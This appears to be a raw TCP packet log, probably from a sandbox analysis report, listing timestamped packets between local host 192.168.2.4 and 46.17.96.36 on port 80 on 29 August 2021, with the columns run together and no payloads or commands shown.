                                        Aug 29, 2021 22:27:39.148857117 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.148858070 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.148922920 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.184129953 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184170961 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184195995 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184212923 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184252024 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.184268951 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184298992 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.184328079 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.184355974 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.184427023 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184453964 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184505939 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.184546947 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.184644938 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184679031 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184735060 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.184768915 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.184829950 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.184904099 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.219878912 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.219913960 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.219930887 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.219973087 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.220015049 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.220134974 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.220268965 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.220292091 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.220455885 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.220484018 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.220655918 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.220693111 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.220824957 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.220848083 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.221061945 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.221194983 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.221364021 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.221388102 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.232424021 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.232510090 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.232557058 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:39.255611897 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.255673885 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.269104004 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.269150972 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.269169092 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.269193888 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.269218922 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.269242048 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.304362059 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:39.304616928 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.475528002 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.476783991 CEST4980180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.477780104 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.509155035 CEST804980146.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.509293079 CEST4980180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.510046005 CEST4980180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.511821985 CEST804980046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.511907101 CEST4980080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.513665915 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.513782024 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.515219927 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.515302896 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.515470982 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.515533924 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.543148994 CEST804980146.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.550241947 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.550275087 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.550322056 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.550405025 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.550465107 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.550493956 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.550528049 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.550554991 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.550694942 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.550720930 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.550810099 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.550856113 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.584520102 CEST804980146.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.584652901 CEST4980180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.587001085 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.587042093 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.587110996 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.587218046 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.587444067 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.587517977 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.587651968 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.587739944 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.587948084 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.588022947 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.588180065 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.588294029 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.588676929 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.588701963 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.588756084 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.588771105 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.588788986 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.588849068 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.622339964 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.622376919 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.622402906 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.622478962 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.622584105 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.622612000 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.622642040 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.622665882 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.622689009 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.622699022 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.623003006 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.623159885 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.623353004 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.623528004 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.623677969 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.623908043 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.623955965 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.623987913 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.624036074 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.624079943 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.624103069 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.624475002 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.624512911 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.658513069 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.658868074 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.659039974 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.659070015 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.659576893 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.659652948 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.660140991 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.698283911 CEST4980180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.699414015 CEST4980380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.699799061 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.699956894 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.732969046 CEST804980146.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.733006954 CEST804980346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.733050108 CEST4980180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.733118057 CEST4980380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.733958006 CEST4980380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.770167112 CEST804980346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.805799961 CEST804980346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.805911064 CEST4980380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.912944078 CEST4980380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.913248062 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.914397001 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.917722940 CEST4980580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.946554899 CEST804980346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.946635008 CEST4980380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.951441050 CEST804980246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.951510906 CEST4980280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.952016115 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.952091932 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.952375889 CEST804980546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.952451944 CEST4980580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.956150055 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.956264019 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.956473112 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.956850052 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.957469940 CEST4980580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.989787102 CEST804980546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.991220951 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.991245031 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.992949963 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.992969036 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.992981911 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.992995024 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.993031025 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.993086100 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:40.993153095 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:40.993211031 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.028248072 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.028275013 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.028286934 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.028354883 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.028386116 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.028405905 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.028423071 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.028490067 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.028503895 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.028528929 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.028541088 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.028553963 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.029601097 CEST804980546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.029680967 CEST4980580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.064865112 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.064889908 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.064903975 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.064917088 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.064929962 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.064946890 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.064961910 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.064963102 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.064975023 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.064990044 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.065011978 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.100975037 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.101001978 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.101011992 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.101304054 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.135195017 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.135267973 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.143050909 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.221348047 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.221498966 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.392518044 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.392796040 CEST4980580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.396107912 CEST4980680192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.425203085 CEST804980546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.425293922 CEST4980580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.428015947 CEST804980446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.428103924 CEST4980480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.431349993 CEST804980646.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.431474924 CEST4980680192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.436784983 CEST4980680192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.438862085 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.471668005 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.471754074 CEST804980646.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.472373962 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.472390890 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.472394943 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.472551107 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.472628117 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.505048037 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.505085945 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.505110979 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.505135059 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.505157948 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.505217075 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.505260944 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.505278111 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.505960941 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.505990028 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.506047964 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.506076097 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.511917114 CEST804980646.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.512006998 CEST4980680192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.538034916 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.538074017 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.538116932 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.538140059 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.538172960 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.538192034 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.538238049 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.538263083 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.538286924 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.538307905 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.538330078 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.538343906 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.538446903 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.538506985 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.539539099 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.539625883 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.539670944 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.539694071 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.539740086 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.539771080 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.570899010 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.570943117 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.570960045 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.571027040 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.571079016 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.571254015 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.571307898 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.571338892 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.571372032 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.571413994 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.571444988 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.571476936 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.571501017 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.571743011 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.571768999 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.571793079 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.572325945 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.572352886 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.572376013 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.572400093 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.572423935 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.572812080 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.572839975 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.572865963 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.603688955 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.604238987 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.604270935 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.604404926 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.604429007 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.604454041 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.604480028 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.605206966 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.628712893 CEST4980680192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.629802942 CEST4980880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.642554998 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.642644882 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.664582968 CEST804980646.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.664653063 CEST4980680192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.664855957 CEST804980846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.664975882 CEST4980880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.665491104 CEST4980880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.700670958 CEST804980846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.739428043 CEST804980846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.739578009 CEST4980880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.878645897 CEST4980880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.879097939 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.880316973 CEST4980980192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.881570101 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.912012100 CEST804980746.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.912127018 CEST4980780192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.914407015 CEST804980846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.914496899 CEST4980880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.915015936 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.915179014 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.915307045 CEST804980946.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.915410042 CEST4980980192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.917011976 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.917108059 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.917357922 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.917476892 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.918452978 CEST4980980192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.949800014 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.949832916 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.950074911 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.950103045 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.950126886 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.950161934 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.950187922 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.950226068 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.950237036 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.950335979 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.950416088 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.950506926 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.953193903 CEST804980946.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.984402895 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.984441996 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.984458923 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.984520912 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.984616041 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.984930992 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.984958887 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.984981060 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.985043049 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.985081911 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:41.995179892 CEST804980946.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:41.995296955 CEST4980980192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:42.017214060 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:42.017257929 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:42.017287016 CEST804981046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:27:42.017311096 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:42.017349005 CEST4981080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:27:42.017370939 CEST4981080192.168.2.446.17.96.36
